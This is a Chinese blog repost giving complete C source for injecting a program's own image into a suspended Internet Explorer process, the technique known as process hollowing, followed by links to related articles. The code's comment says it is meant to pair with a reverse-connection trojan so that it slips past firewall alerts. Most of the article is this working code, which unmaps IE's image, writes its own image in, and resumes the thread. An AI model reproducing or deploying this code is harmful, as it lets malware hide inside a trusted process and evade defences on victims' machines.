直接将自身代码注入傀儡进程

最新推荐文章于 2024-05-09 09:11:23 发布
最新推荐文章于 2024-05-09 09:11:23 发布
阅读量7.6k 收藏 7
点赞数
分类专栏: windows编程 文章标签: null path ie header 防火墙 dos

EXE注入-傀儡进程
2008-08-16 16:38

      直接将自身代码注入傀儡进程,不需要DLL。首先用CreateProcess来创建一个挂起的IE进程,创建时候就把它挂起。然后得到它的装载基址,使用函数ZwUnmapViewOfSection来卸载这个这个基址内存空间的数据,。再用VirtualAllocEx来个ie进程重新分配内存空间,大小为要注入程序的大小(就是自身的imagesize)。使用WriteProcessMemory重新写IE进程的基址,就是刚才分配的内存空间的地址。再用WriteProcessMemory把自己的代码写入IE的内存空间。用SetThreadContext设置下进程状态,最后使用ResumeThread继续运行IE进程。

/********************************************************************* 
   Author: Polymorphours 
   Date: 2005/1/10

   另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的 
   反向连接报警。 
**********************************************************************/

#include <stdio.h> 
#include <windows.h>


BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr);  

typedef struct _ChildProcessInfo {

DWORD dwBaseAddress; 
DWORD dwReserve; 
} CHILDPROCESS, *PCHILDPROCESS;

BOOL 
FindIePath( 
char *IePath, 
int *dwBuffSize 
); 

BOOL InjectProcess(void);

DWORD 
GetSelfImageSize( 
HMODULE hModule 
);

BOOL 
CreateInjectProcess( 
PPROCESS_INFORMATION pi, 
PCONTEXT pThreadCxt, 
CHILDPROCESS *pChildProcess 
);

char szIePath[MAX_PATH];

int main(void) 

if (InjectProcess() ) 

   printf("This is my a test code,made by (Polymorphours)shadow3./r/n"); 

else 

   MessageBox(NULL,"进程插入完成","Text",MB_OK); 

return 0; 
}

BOOL FindIePath(OUT char *IePath, OUT int *dwBuffSize) 

char szSystemDir[MAX_PATH]; 
GetSystemDirectory(szSystemDir,MAX_PATH); 

szSystemDir[2] = '/0'; 
lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe"); 
lstrcpy(IePath, szSystemDir); 
return TRUE; 
}

BOOL InjectProcess(void) 

char szModulePath[MAX_PATH]; 
DWORD dwImageSize = 0; 

STARTUPINFO si; 
PROCESS_INFORMATION pi; 
CONTEXT ThreadCxt; 
DWORD *PPEB; 
DWORD dwWrite = 0; 
CHILDPROCESS stChildProcess; 
LPVOID lpVirtual = NULL; 
PIMAGE_DOS_HEADER pDosheader = NULL; 
PIMAGE_NT_HEADERS pVirPeHead = NULL; 

HMODULE hModule = NULL; 

ZeroMemory( szModulePath, MAX_PATH ); 
ZeroMemory( szIePath, MAX_PATH ); 

GetModuleFileName( NULL, szModulePath, MAX_PATH ); 
FindIePath( szIePath, NULL ); 

if ( lstrcmpiA( szIePath, szModulePath ) == 0 )
{ //当前运行在IE空间里
   return FALSE; 


hModule = GetModuleHandle( NULL ); 
if ( hModule == NULL ) 

   return FALSE; 


pDosheader = (PIMAGE_DOS_HEADER)hModule; 
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew); 

dwImageSize = GetSelfImageSize(hModule); 

// 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程 
if ( CreateInjectProcess(&pi, &ThreadCxt, &stChildProcess ))

   printf("CHILD PID: [%d]/r/n",pi.dwProcessId); 
   // 卸载需要注入进程中的代码 
   if( UnloadShell(pi.hProcess, stChildProcess.dwBaseAddress) )
   { 
    // 重新分配内存 
    lpVirtual = VirtualAllocEx( 
     pi.hProcess, 
     (LPVOID)hModule, 
     dwImageSize, 
     MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
   
    if( lpVirtual ) 
    { 
     printf("Unmapped and Allocated Mem Success./r/n"); 
    }
   } 
   else 
   { 
    printf("ZwUnmapViewOfSection() failed./r/n"); 
    return TRUE; 
   } 
  
   if(lpVirtual) 
   { 
    PPEB = (DWORD *)ThreadCxt.Ebx; 
    // 重写装载地址 
    WriteProcessMemory( 
     pi.hProcess, 
     &PPEB[2], 
     &lpVirtual, 
     sizeof(DWORD), 
     &dwWrite); 
   
    // 写入自己进程的代码到目标进程 
    if ( WriteProcessMemory( 
     pi.hProcess, 
     lpVirtual, 
     hModule, 
     dwImageSize, 
     &dwWrite) ) 
    { 
     printf("image inject into process success./r/n"); 
    
     ThreadCxt.ContextFlags = CONTEXT_FULL; 
     if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ) 
     { 
      ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint; 
     } 
     else 
     { 
      ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint; 
     } 
#ifdef DEBUG 
     printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax); 
     printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx); 
     printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx); 
     printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx); 
     printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip); 
#endif 
     SetThreadContext(pi.hThread, &ThreadCxt); 
     ResumeThread(pi.hThread); 
    } 
    else 
    { 
     printf("WirteMemory Failed,code:%d/r/n",GetLastError()); 
     TerminateProcess(pi.hProcess, 0); 
    } 
   } 
   else 
   { 
    printf("VirtualMemory Failed,code:%d/r/n",GetLastError()); 
    TerminateProcess(pi.hProcess, 0); 
   } 

return TRUE; 
}

DWORD GetSelfImageSize(HMODULE hModule) 

DWORD dwImageSize; 
_asm 

   mov ecx,0x30 
   mov eax, fs:[ecx] 
   mov eax, [eax + 0x0c] 
   mov esi, [eax + 0x0c] 
   add esi,0x20 
   lodsd 
   mov dwImageSize,eax 

return dwImageSize; 
}

BOOL CreateInjectProcess( 
       PPROCESS_INFORMATION pi, 
       PCONTEXT pThreadCxt, 
       CHILDPROCESS *pChildProcess ) 

STARTUPINFO si; 

DWORD *PPEB; 
DWORD read; 

// 使用挂起模式启动ie 
if( CreateProcess( 
   NULL, 
   szIePath, 
   NULL, 
   NULL, 
   0, 
   CREATE_SUSPENDED, 
   NULL, 
   NULL, 
   &si, 
   pi )) 

   pThreadCxt->ContextFlags = CONTEXT_FULL; 
   GetThreadContext(pi->hThread, pThreadCxt); 
  
   PPEB = (DWORD *)pThreadCxt->Ebx; 
   // 得到ie的装载基地址 
   ReadProcessMemory( 
    pi->hProcess, 
    &PPEB[2], 
    (LPVOID)&(pChildProcess->dwBaseAddress), 
    sizeof(DWORD), 
    &read ); 
  
   return TRUE; 

return FALSE; 
}

BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr)   
{   
    typedef unsigned long (__stdcall *pfZwUnmapViewOfSection)(unsigned long, unsigned long);   
    pfZwUnmapViewOfSection ZwUnmapViewOfSection = NULL; 

    BOOL res = FALSE;   
    HMODULE m = LoadLibrary("ntdll.dll");   
    if(m)
{   
        ZwUnmapViewOfSection = (pfZwUnmapViewOfSection)GetProcAddress(m, "ZwUnmapViewOfSection");   
        if(ZwUnmapViewOfSection)   
            res = (ZwUnmapViewOfSection((unsigned long)ProcHnd, BaseAddr) == 0);   
        FreeLibrary(m);   
    }   
    return res; 
}

sevenpic
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
傀儡进程注入
qq_40710190的博客
05-08 955
傀儡进程注入 这个注入之所以叫傀儡进程注入是因为其做法是先创建一个A进程,然后将其内存替换成要执行的代码,而从外部来看就是最初创建的A进程。 从我的视角来看跟PE文件注入还蛮像的,不同点在于PE文件注入是将代码注入进去后修改EntryPoint引导至注入代码,而傀儡进程注入则更加简单暴力一些😋,把所有内存替换了。 多亏了之前的一些PE基础因此没有特别费劲PE文件头格式解析 本章详细讲解m0n0ph1的源码 创建傀儡进程 根据一开始所说,我们需要创建一个进程 printf("Creating process
dll注入系列——傀儡进程
40KO的博客
04-11 992
0x0介绍 之前说过,要动态注入dll文件,则需要执行程序中本身没有的加载操作,必须改变控制流,除了创建线程外,还可以劫持控制流。这与二进制漏洞利用比较类似,我们向程序写入一段shellcode,然后改变线程上下文,让其去执行shellcode,这段shellcode完成LoadLibrary的操作,就完成了dll注入傀儡进程的本质是利用其他进程空间来执行我们的写入代码,它的实现并不困难...
Windows傀儡进程实现C++代码
04-28
Windows平台傀儡进程实现,采用C++, vs2008实现,完美实现
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
05-09 2756
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
创建傀儡进程
挖树
10-14 966
折腾好久,总算完成了自己第一次的傀儡进程编写。 效果:使当前进程创建一个子进程(同名) 掏空子进程注入任何自己编写好的其他exe。 注意点 1.用来创建傀儡进程的父进程程序 需要是32位程序,因为编码的程序本身就是win32控制台程序 2.注入进程中的程序32位,64位都行 3.pe结构取值时一定一定要留心是否需要加基址。 4.注意区分CUI程序和GUI程序,如果代码编写的是32位控制台程序,...
代码注入傀儡进程
sevenpic的专栏
09-13 1972
 傀儡进程——Exe注入2009-09-17 16:29#include "stdafx.h"#include typedef long NTSTATUS;typedef NTSTATUS (__stdcall *pfnZwUnmapViewOfSection)(        IN HANDLE ProcessHandle,        IN LPVOID BaseAddress        );BOOL CreateIEProcess();PROCESS_INFORMATION pi  = {0};
傀儡进程
苞米地里捉小鸡的博客
10-13 624
背景 傀儡进程本质上是借用正常的软件进程或是系统进程的外壳来执行非正常的恶意操作。 函数介绍 1.GetThreadContext 获取指定线程的上下文 2.SetThreadContext 设置指定线程的上下文 3.ResumeThread 减少线程的暂停计数。当暂停计数递减到零时,恢复线程的执行 实现原理 (1)第一步 利用CreateProcess创建进程并且使用CREATE_SUSPENDED标志挂起主线程 bRet = ::CreateProcess(pszFilePat
[Rootkit] 傀儡进程
LYSM
08-16 1233
实现原理: 以挂起的方式打开目标进程,将ShellCode代码写入目标进程,并修改目标进程的执行流程,使其转而执行ShellCode代码,这样,进程还是目标原本进程,但执行的操作却替换成我们的ShellCode了。 实现过程: (1).调用CreateProcess以挂起的方式(CREATE_SUSPENDED)创建进程 (2).调用VirtualAllocEx函数申请一个可读、可写、可执行的内存 (3).调用WriteProcessMemory将Shellcode数据写入刚申请的内存中 (4).调用Ge
创建傀儡进程代码
Sven的忘却日记
07-29 2014
相比传统的创建傀儡进程的方法,更简单粗暴一些,不用卸载目标进程空间内存。直接利用现有内存进行覆盖写入即可。 减少了一些步骤。 具体步骤: 1.挂起模式创建svchost.exe 2.获取进程入口点 3.将shellcode写到入口点 4.恢复线程执行 #include "stdafx.h" #include <windows.h> #include <Winternl.h>...
傀儡进程学习
0xDQ的博客
10-05 4262
0x00 前言 最近做了一道18年swpuctf的题,分析了一个病毒,正巧都用到了傀儡进程,就想着把傀儡进程学习一下。本文权当个人的学习总结了一些网上的文章,如有错误,还请路过的大佬斧正。 0x01 SWPUCTF -- GAME 进入main函数 先获取当前目录,再拼上GAME.EXE 进入sub_4011D0 首先寻找资源,做准备工作,进入sub_4012C0 1)检测PE结构 2)CreateProcessA 创建进程 3)GetThreadContext...
易语言驱动级进程信息伪装源码 只支持 64位系统
06-06
易语言驱动级进程信息伪装源码 只支持 64位系统。@莫爱。
进程隐藏,
02-23
远程线程注入,例子中是注入到“CALC.EXE”你可改成任何其他的进程
Using Process Monitor to identify possible code injection
cnbird's blog
11-18 921
In the past, especially learnt from SANS FOR610, I use many tools in performing behavioural analysis of malware. It is good to have all kinds of tools available in my tailor made virtual machine
傀儡进程内存Dump
XboxMicro
03-01 1367
傀儡进程(参见《动态加载并执行Win32可执行程序》),简单的说是指通过给CreateProcess传递一个CREATE_SUSPENDED参数可以使得被创建的子进程处于挂起状态,此时EXE的映像会被加载到进程空间中,但是并不会立即被执行,除非调用ResumeThread。在ResumeThread之前,通过GetThreadContext获取主线程的上下文以取得PEB等,调用ZwUnmapVie
向其他进程注入代码的三种方法
haizhongyun的专栏
11-09 3595
原版地址:http://www.codeproject.com/threads/winspy.asp?df=100&forumid=16291&select=1025152&msg=1025152 下载整个压缩包 下载WinSpy  作者:RobertKuster 翻译:袁晓辉(hyzs@sina.com) 摘要:如何向其他线程的地址空间中注入代码并在这个线程的上下文中执行之。 目录:
代码注入(提升当前进程权限,创建远程线程)
MessCodes
12-23 1590
代码注入源码分析: [cpp] view plaincopy #include    #pragma comment(lib, "Advapi32.lib")   #pragma comment(lib, "User32.lib")      #define PATHNAME_LENGTH 256      void EnableDebu
傀儡注入
weixin_33932129的博客
12-14 595
开源poc win7 64版本https://github.com/haidragon/proce***efundwin7 32位版本https://github.com/haidragon/Inject-dll-by-Process-Doppelganging另外一种https://github.com/haidragon/Process-Hollowing 转载于:https://blog....
傀儡sql注入批量扫描工具
11-03
傀儡SQL注入批量扫描工具是一种用于检测和扫描网站是否存在傀儡SQL注入漏洞的软件工具。傀儡SQL注入是一种常见的网络安全漏洞,攻击者可以利用该漏洞来获取数据库中的敏感信息,或者更严重的情况下,完全控制受攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值